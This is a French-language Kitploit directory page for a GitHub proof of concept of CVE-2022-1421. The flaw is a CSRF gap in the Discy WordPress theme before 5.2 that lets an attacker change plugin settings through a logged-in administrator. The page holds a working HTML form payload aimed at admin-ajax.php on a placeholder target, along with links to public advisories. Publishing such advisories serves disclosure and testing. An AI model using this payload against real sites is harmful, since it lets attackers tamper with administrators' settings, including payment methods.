Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-1421 | Kitploit
Outils/GitHubGitHub/nb1b3k/cve-2022-1421
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnb1b3k/cve-2022-1421

CVE-2022-1421

Voir le dépôt
73il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-1421

Une preuve de concept pour CVE-2022-1421

Discy < 5.2 - Mise à jour des paramètres via CSRF

Discy < 5.2 ne dispose pas de contrôles CSRF dans certaines actions AJAX, ce qui permet à un attaquant de faire modifier à un administrateur connecté les paramètres arbitraires du plugin, y compris les méthodes de paiement, via une attaque CSRF.

Thème concerné

Discy < 5.2

POC

root@kitploit:~
<html>
  <body>
    <form action="https://target.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_update_options">
      <input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
      <input type="submit" value="Submit request">
    </form>
  </body>
</html> 

Références

https://wpscan.com/vulnerability/a7a24e8e-9056-4967-bcad-b96cc0c5b249

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1421

Télécharger l’outil